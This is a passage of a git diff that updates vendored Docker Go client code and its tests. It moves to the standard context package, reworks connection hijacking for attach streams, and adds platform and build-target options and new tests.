+++ b/vendor/github.com/docker/docker/client/events.go
@@ -1,12 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 	"time"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/events"
 	"github.com/docker/docker/api/types/filters"
diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go
index ba82d2f542..4a39901b45 100644
--- a/vendor/github.com/docker/docker/client/events_test.go
+++ b/vendor/github.com/docker/docker/client/events_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -10,8 +11,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/events"
 	"github.com/docker/docker/api/types/filters"
diff --git a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go
index 74c53f52b3..35f5dd86dc 100644
--- a/vendor/github.com/docker/docker/client/hijack.go
+++ b/vendor/github.com/docker/docker/client/hijack.go
@@ -1,37 +1,21 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"bufio"
+	"context"
 	"crypto/tls"
-	"errors"
 	"fmt"
 	"net"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
-	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/tlsconfig"
 	"github.com/docker/go-connections/sockets"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
-// tlsClientCon holds tls information and a dialed connection.
-type tlsClientCon struct {
-	*tls.Conn
-	rawConn net.Conn
-}
-
-func (c *tlsClientCon) CloseWrite() error {
-	// Go standard tls.Conn doesn't provide the CloseWrite() method so we do it
-	// on its underlying connection.
-	if conn, ok := c.rawConn.(types.CloseWriter); ok {
-		return conn.CloseWrite()
-	}
-	return nil
-}
-
 // postHijacked sends a POST request and hijacks the connection.
 func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) {
 	bodyEncoded, err := encodeData(body)
@@ -46,16 +30,32 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu
 	}
 	req = cli.addHeaders(req, headers)
 
+	conn, err := cli.setupHijackConn(req, "tcp")
+	if err != nil {
+		return types.HijackedResponse{}, err
+	}
+
+	return types.HijackedResponse{Conn: conn, Reader: bufio.NewReader(conn)}, err
+}
+
+func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) {
+	if tlsConfig != nil && proto != "unix" && proto != "npipe" {
+		return tls.Dial(proto, addr, tlsConfig)
+	}
+	if proto == "npipe" {
+		return sockets.DialPipe(addr, 32*time.Second)
+	}
+	return net.Dial(proto, addr)
+}
+
+func (cli *Client) setupHijackConn(req *http.Request, proto string) (net.Conn, error) {
 	req.Host = cli.addr
 	req.Header.Set("Connection", "Upgrade")
-	req.Header.Set("Upgrade", "tcp")
+	req.Header.Set("Upgrade", proto)
 
 	conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport))
 	if err != nil {
-		if strings.Contains(err.Error(), "connection refused") {
-			return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?")
-		}
-		return types.HijackedResponse{}, err
+		return nil, errors.Wrap(err, "cannot connect to the Docker daemon. Is 'docker daemon' running on this host?")
 	}
 
 	// When we set up a TCP connection for hijack, there could be long periods
@@ -72,106 +72,58 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu
 	defer clientconn.Close()
 
 	// Server hijacks the connection, error 'connection closed' expected
-	_, err = clientconn.Do(req)
-
-	rwc, br := clientconn.Hijack()
-
-	return types.HijackedResponse{Conn: rwc, Reader: br}, err
-}
-
-func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) {
-	return tlsDialWithDialer(new(net.Dialer), network, addr, config)
-}
-
-// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in
-// order to return our custom tlsClientCon struct which holds both the tls.Conn
-// object _and_ its underlying raw connection. The rationale for this is that
-// we need to be able to close the write end of the connection when attaching,
-// which tls.Conn does not provide.
-func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) {
-	// We want the Timeout and Deadline values from dialer to cover the
-	// whole process: TCP connection and TLS handshake. This means that we
-	// also need to start our own timers now.
-	timeout := dialer.Timeout
-
-	if !dialer.Deadline.IsZero() {
-		deadlineTimeout := dialer.Deadline.Sub(time.Now())
-		if timeout == 0 || deadlineTimeout < timeout {
-			timeout = deadlineTimeout
+	resp, err := clientconn.Do(req)
+	if err != httputil.ErrPersistEOF {
+		if err != nil {
+			return nil, err
+		}
+		if resp.StatusCode != http.StatusSwitchingProtocols {
+			resp.Body.Close()
+			return nil, fmt.Errorf("unable to upgrade to %s, received %d", proto, resp.StatusCode)
 		}
 	}
 
-	var errChannel chan error
-
-	if timeout != 0 {
-		errChannel = make(chan error, 2)
-		time.AfterFunc(timeout, func() {
-			errChannel <- errors.New("")
-		})
-	}
-
-	proxyDialer, err := sockets.DialerFromEnvironment(dialer)
-	if err != nil {
-		return nil, err
-	}
-
-	rawConn, err := proxyDialer.Dial(network, addr)
-	if err != nil {
-		return nil, err
-	}
-	// When we set up a TCP connection for hijack, there could be long periods
-	// of inactivity (a long running command with no output) that in certain
-	// network setups may cause ECONNTIMEOUT, leaving the client in an unknown
-	// state. Setting TCP KeepAlive on the socket connection will prohibit
-	// ECONNTIMEOUT unless the socket connection truly is broken
-	if tcpConn, ok := rawConn.(*net.TCPConn); ok {
-		tcpConn.SetKeepAlive(true)
-		tcpConn.SetKeepAlivePeriod(30 * time.Second)
-	}
-
-	colonPos := strings.LastIndex(addr, ":")
-	if colonPos == -1 {
-		colonPos = len(addr)
-	}
-	hostname := addr[:colonPos]
-
-	// If no ServerName is set, infer the ServerName
-	// from the hostname we're connecting to.
-	if config.ServerName == "" {
-		// Make a copy to avoid polluting argument or default.
-		config = tlsconfig.Clone(config)
-		config.ServerName = hostname
+	c, br := clientconn.Hijack()
+	if br.Buffered() > 0 {
+		// If there is buffered content, wrap the connection.  We return an
+		// object that implements CloseWrite iff the underlying connection
+		// implements it.
+		if _, ok := c.(types.CloseWriter); ok {
+			c = &hijackedConnCloseWriter{&hijackedConn{c, br}}
+		} else {
+			c = &hijackedConn{c, br}
+		}
+	} else {
+		br.Reset(nil)
 	}
 
-	conn := tls.Client(rawConn, config)
-
-	if timeout == 0 {
-		err = conn.Handshake()
-	} else {
-		go func() {
-			errChannel <- conn.Handshake()
-		}()
+	return c, nil
+}
 
-		err = <-errChannel
-	}
+// hijackedConn wraps a net.Conn and is returned by setupHijackConn in the case
+// that a) there was already buffered data in the http layer when Hijack() was
+// called, and b) the underlying net.Conn does *not* implement CloseWrite().
+// hijackedConn does not implement CloseWrite() either.
+type hijackedConn struct {
+	net.Conn
+	r *bufio.Reader
+}
 
-	if err != nil {
-		rawConn.Close()
-		return nil, err
-	}
+func (c *hijackedConn) Read(b []byte) (int, error) {
+	return c.r.Read(b)
+}
 
-	// This is Docker difference with standard's crypto/tls package: returned a
-	// wrapper which holds both the TLS and raw connections.
-	return &tlsClientCon{conn, rawConn}, nil
+// hijackedConnCloseWriter is a hijackedConn which additionally implements
+// CloseWrite().  It is returned by setupHijackConn in the case that a) there
+// was already buffered data in the http layer when Hijack() was called, and b)
+// the underlying net.Conn *does* implement CloseWrite().
+type hijackedConnCloseWriter struct {
+	*hijackedConn
 }
 
-func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) {
-	if tlsConfig != nil && proto != "unix" && proto != "npipe" {
-		// Notice this isn't Go standard's tls.Dial function
-		return tlsDial(proto, addr, tlsConfig)
-	}
-	if proto == "npipe" {
-		return sockets.DialPipe(addr, 32*time.Second)
-	}
-	return net.Dial(proto, addr)
+var _ types.CloseWriter = &hijackedConnCloseWriter{}
+
+func (c *hijackedConnCloseWriter) CloseWrite() error {
+	conn := c.Conn.(types.CloseWriter)
+	return conn.CloseWrite()
 }
diff --git a/vendor/github.com/docker/docker/client/hijack_test.go b/vendor/github.com/docker/docker/client/hijack_test.go
new file mode 100644
index 0000000000..823bf344f5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/hijack_test.go
@@ -0,0 +1,103 @@
+package client
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"testing"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+	"gotest.tools/assert"
+)
+
+func TestTLSCloseWriter(t *testing.T) {
+	t.Parallel()
+
+	var chErr chan error
+	ts := &httptest.Server{Config: &http.Server{Handler: http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
+		chErr = make(chan error, 1)
+		defer close(chErr)
+		if err := httputils.ParseForm(req); err != nil {
+			chErr <- errors.Wrap(err, "error parsing form")
+			http.Error(w, err.Error(), 500)
+			return
+		}
+		r, rw, err := httputils.HijackConnection(w)
+		if err != nil {
+			chErr <- errors.Wrap(err, "error hijacking connection")
+			http.Error(w, err.Error(), 500)
+			return
+		}
+		defer r.Close()
+
+		fmt.Fprint(rw, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\n")
+
+		buf := make([]byte, 5)
+		_, err = r.Read(buf)
+		if err != nil {
+			chErr <- errors.Wrap(err, "error reading from client")
+			return
+		}
+		_, err = rw.Write(buf)
+		if err != nil {
+			chErr <- errors.Wrap(err, "error writing to client")
+			return
+		}
+	})}}
+
+	var (
+		l   net.Listener
+		err error
+	)
+	for i := 1024; i < 10000; i++ {
+		l, err = net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%d", i))
+		if err == nil {
+			break
+		}
+	}
+	assert.Assert(t, err)
+
+	ts.Listener = l
+	defer l.Close()
+
+	defer func() {
+		if chErr != nil {
+			assert.Assert(t, <-chErr)
+		}
+	}()
+
+	ts.StartTLS()
+	defer ts.Close()
+
+	serverURL, err := url.Parse(ts.URL)
+	assert.Assert(t, err)
+
+	client, err := NewClient("tcp://"+serverURL.Host, "", ts.Client(), nil)
+	assert.Assert(t, err)
+
+	resp, err := client.postHijacked(context.Background(), "/asdf", url.Values{}, nil, map[string][]string{"Content-Type": {"text/plain"}})
+	assert.Assert(t, err)
+	defer resp.Close()
+
+	if _, ok := resp.Conn.(types.CloseWriter); !ok {
+		t.Fatal("tls conn did not implement the CloseWrite interface")
+	}
+
+	_, err = resp.Conn.Write([]byte("hello"))
+	assert.Assert(t, err)
+
+	b, err := ioutil.ReadAll(resp.Reader)
+	assert.Assert(t, err)
+	assert.Assert(t, string(b) == "hello")
+	assert.Assert(t, resp.CloseWrite())
+
+	// This should error since writes are closed
+	_, err = resp.Conn.Write([]byte("no"))
+	assert.Assert(t, err != nil)
+}
diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go
index 6fde75dcfd..dff19b989f 100644
--- a/vendor/github.com/docker/docker/client/image_build.go
+++ b/vendor/github.com/docker/docker/client/image_build.go
@@ -1,14 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"io"
 	"net/http"
 	"net/url"
 	"strconv"
-
-	"golang.org/x/net/context"
+	"strings"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
@@ -29,7 +29,14 @@ func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, optio
 		return types.ImageBuildResponse{}, err
 	}
 	headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf))
-	headers.Set("Content-Type", "application/tar")
+
+	if options.Platform != "" {
+		if err := cli.NewVersionError("1.32", "platform"); err != nil {
+			return types.ImageBuildResponse{}, err
+		}
+		query.Set("platform", options.Platform)
+	}
+	headers.Set("Content-Type", "application/x-tar")
 
 	serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers)
 	if err != nil {
@@ -48,6 +55,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur
 	query := url.Values{
 		"t":           options.Tags,
 		"securityopt": options.SecurityOpt,
+		"extrahosts":  options.ExtraHosts,
 	}
 	if options.SuppressOutput {
 		query.Set("q", "1")
@@ -94,6 +102,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur
 	query.Set("cgroupparent", options.CgroupParent)
 	query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10))
 	query.Set("dockerfile", options.Dockerfile)
+	query.Set("target", options.Target)
 
 	ulimitsJSON, err := json.Marshal(options.Ulimits)
 	if err != nil {
@@ -118,6 +127,15 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur
 		return query, err
 	}
 	query.Set("cachefrom", string(cacheFromJSON))
-
+	if options.SessionID != "" {
+		query.Set("session", options.SessionID)
+	}
+	if options.Platform != "" {
+		query.Set("platform", strings.ToLower(options.Platform))
+	}
+	if options.BuildID != "" {
+		query.Set("buildid", options.BuildID)
+	}
+	query.Set("version", string(options.Version))
 	return query, nil
 }
diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go
index b9d04f817a..95c11bc3e5 100644
--- a/vendor/github.com/docker/docker/client/image_build_test.go
+++ b/vendor/github.com/docker/docker/client/image_build_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,8 +10,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/go-units"
@@ -170,8 +169,8 @@ func TestImageBuild(t *testing.T) {
 					return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig)
 				}
 				contentType := r.Header.Get("Content-Type")
-				if contentType != "application/tar" {
-					return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType)
+				if contentType != "application/x-tar" {
+					return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/x-tar', got %s", contentType)
 				}
 
 				// Check query parameters
diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go
index cf023a7186..239380474e 100644
--- a/vendor/github.com/docker/docker/client/image_create.go
+++ b/vendor/github.com/docker/docker/client/image_create.go
@@ -1,26 +1,29 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
+	"strings"
 
-	"golang.org/x/net/context"
-
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/reference"
 )
 
 // ImageCreate creates a new image based in the parent options.
 // It returns the JSON content in the response body.
 func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) {
-	repository, tag, err := reference.Parse(parentReference)
+	ref, err := reference.ParseNormalizedNamed(parentReference)
 	if err != nil {
 		return nil, err
 	}
 
 	query := url.Values{}
-	query.Set("fromImage", repository)
-	query.Set("tag", tag)
+	query.Set("fromImage", reference.FamiliarName(ref))
+	query.Set("tag", getAPITagFromNamedRef(ref))
+	if options.Platform != "" {
+		query.Set("platform", strings.ToLower(options.Platform))
+	}
 	resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth)
 	if err != nil {
 		return nil, err
diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go
index 5c2edd2ad5..b89f16d27b 100644
--- a/vendor/github.com/docker/docker/client/image_create_test.go
+++ b/vendor/github.com/docker/docker/client/image_create_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go
index acb1ee9278..0151b9517f 100644
--- a/vendor/github.com/docker/docker/client/image_history.go
+++ b/vendor/github.com/docker/docker/client/image_history.go
@@ -1,16 +1,16 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/image"
 )
 
 // ImageHistory returns the changes in an image in history format.
-func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) {
-	var history []types.ImageHistory
+func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]image.HistoryResponseItem, error) {
+	var history []image.HistoryResponseItem
 	serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil)
 	if err != nil {
 		return history, err
diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go
index 729edb1ad5..0217bf575a 100644
--- a/vendor/github.com/docker/docker/client/image_history_test.go
+++ b/vendor/github.com/docker/docker/client/image_history_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,7 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/image"
 )
 
 func TestImageHistoryError(t *testing.T) {
@@ -30,7 +30,7 @@ func TestImageHistory(t *testing.T) {
 			if !strings.HasPrefix(r.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
 			}
-			b, err := json.Marshal([]types.ImageHistory{
+			b, err := json.Marshal([]image.HistoryResponseItem{
 				{
 					ID:   "image_id1",
 					Tags: []string{"tag1", "tag2"},
diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go
index c6f154b249..c2972ea950 100644
--- a/vendor/github.com/docker/docker/client/image_import.go
+++ b/vendor/github.com/docker/docker/client/image_import.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
-
-	"golang.org/x/net/context"
+	"strings"
 
 	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
@@ -15,7 +15,7 @@ import (
 func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) {
 	if ref != "" {
 		//Check if the given image name can be resolved
-		if _, err := reference.ParseNamed(ref); err != nil {
+		if _, err := reference.ParseNormalizedNamed(ref); err != nil {
 			return nil, err
 		}
 	}
@@ -25,6 +25,9 @@ func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSour
 	query.Set("repo", ref)
 	query.Set("tag", options.Tag)
 	query.Set("message", options.Message)
+	if options.Platform != "" {
+		query.Set("platform", strings.ToLower(options.Platform))
+	}
 	for _, change := range options.Changes {
 		query.Add("changes", change)
 	}
diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go
index e309be74e6..944cd52fec 100644
--- a/vendor/github.com/docker/docker/client/image_import_test.go
+++ b/vendor/github.com/docker/docker/client/image_import_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestImageImportError(t *testing.T) {
@@ -37,7 +37,7 @@ func TestImageImport(t *testing.T) {
 			}
 			repo := query.Get("repo")
 			if repo != "repository_name:imported" {
-				return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo)
+				return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name:imported', got %s", repo)
 			}
 			tag := query.Get("tag")
 			if tag != "imported" {
diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go
index b3a64ce2f8..2f8f6d2f14 100644
--- a/vendor/github.com/docker/docker/client/image_inspect.go
+++ b/vendor/github.com/docker/docker/client/image_inspect.go
@@ -1,23 +1,22 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ImageInspectWithRaw returns the image information and its raw representation.
 func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) {
+	if imageID == "" {
+		return types.ImageInspect{}, nil, objectNotFoundError{object: "image", id: imageID}
+	}
 	serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return types.ImageInspect{}, nil, imageNotFoundError{imageID}
-		}
-		return types.ImageInspect{}, nil, err
+		return types.ImageInspect{}, nil, wrapResponseError(err, serverResp, "image", imageID)
 	}
 	defer ensureReaderClosed(serverResp)
 
diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go
index 74a4e49805..a910872d1c 100644
--- a/vendor/github.com/docker/docker/client/image_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/image_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,7 +12,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestImageInspectError(t *testing.T) {
@@ -31,11 +32,23 @@ func TestImageInspectImageNotFound(t *testing.T) {
 	}
 
 	_, _, err := client.ImageInspectWithRaw(context.Background(), "unknown")
-	if err == nil || !IsErrImageNotFound(err) {
+	if err == nil || !IsErrNotFound(err) {
 		t.Fatalf("expected an imageNotFound error, got %v", err)
 	}
 }
 
+func TestImageInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.ImageInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
+
 func TestImageInspect(t *testing.T) {
 	expectedURL := "/images/image_id/json"
 	expectedTags := []string{"tag1", "tag2"}
diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go
index f26464f67c..32fae27b37 100644
--- a/vendor/github.com/docker/docker/client/image_list.go
+++ b/vendor/github.com/docker/docker/client/image_list.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/versions"
-	"golang.org/x/net/context"
 )
 
 // ImageList returns a list of images in the docker host.
diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go
index 7c4a46414d..3ba5239a53 100644
--- a/vendor/github.com/docker/docker/client/image_list_test.go
+++ b/vendor/github.com/docker/docker/client/image_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,7 +12,6 @@ import (
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 func TestImageListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go
index 77aaf1af36..91016e493c 100644
--- a/vendor/github.com/docker/docker/client/image_load.go
+++ b/vendor/github.com/docker/docker/client/image_load.go
@@ -1,11 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go
index 68dc14ff22..116317da75 100644
--- a/vendor/github.com/docker/docker/client/image_load_test.go
+++ b/vendor/github.com/docker/docker/client/image_load_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestImageLoadError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go
index 5ef98b7f02..78ee3f6c49 100644
--- a/vendor/github.com/docker/docker/client/image_prune.go
+++ b/vendor/github.com/docker/docker/client/image_prune.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // ImagesPrune requests the daemon to delete unused data
diff --git a/vendor/github.com/docker/docker/client/image_prune_test.go b/vendor/github.com/docker/docker/client/image_prune_test.go
new file mode 100644
index 0000000000..9b0839bb6c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_prune_test.go
@@ -0,0 +1,120 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestImagesPruneError(t *testing.T) {
+	client := &Client{
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+	}
+
+	filters := filters.NewArgs()
+
+	_, err := client.ImagesPrune(context.Background(), filters)
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
+}
+
+func TestImagesPrune(t *testing.T) {
+	expectedURL := "/v1.25/images/prune"
+
+	danglingFilters := filters.NewArgs()
+	danglingFilters.Add("dangling", "true")
+
+	noDanglingFilters := filters.NewArgs()
+	noDanglingFilters.Add("dangling", "false")
+
+	labelFilters := filters.NewArgs()
+	labelFilters.Add("dangling", "true")
+	labelFilters.Add("label", "label1=foo")
+	labelFilters.Add("label", "label2!=bar")
+
+	listCases := []struct {
+		filters             filters.Args
+		expectedQueryParams map[string]string
+	}{
+		{
+			filters: filters.Args{},
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": "",
+			},
+		},
+		{
+			filters: danglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true}}`,
+			},
+		},
+		{
+			filters: noDanglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"false":true}}`,
+			},
+		},
+		{
+			filters: labelFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					assert.Check(t, is.Equal(expected, actual))
+				}
+				content, err := json.Marshal(types.ImagesPruneReport{
+					ImagesDeleted: []types.ImageDeleteResponseItem{
+						{
+							Deleted: "image_id1",
+						},
+						{
+							Deleted: "image_id2",
+						},
+					},
+					SpaceReclaimed: 9999,
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+			version: "1.25",
+		}
+
+		report, err := client.ImagesPrune(context.Background(), listCase.filters)
+		assert.Check(t, err)
+		assert.Check(t, is.Len(report.ImagesDeleted, 2))
+		assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go
index 3bffdb70e8..d97aacf8c5 100644
--- a/vendor/github.com/docker/docker/client/image_pull.go
+++ b/vendor/github.com/docker/docker/client/image_pull.go
@@ -1,14 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/http"
 	"net/url"
+	"strings"
 
-	"golang.org/x/net/context"
-
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/reference"
 )
 
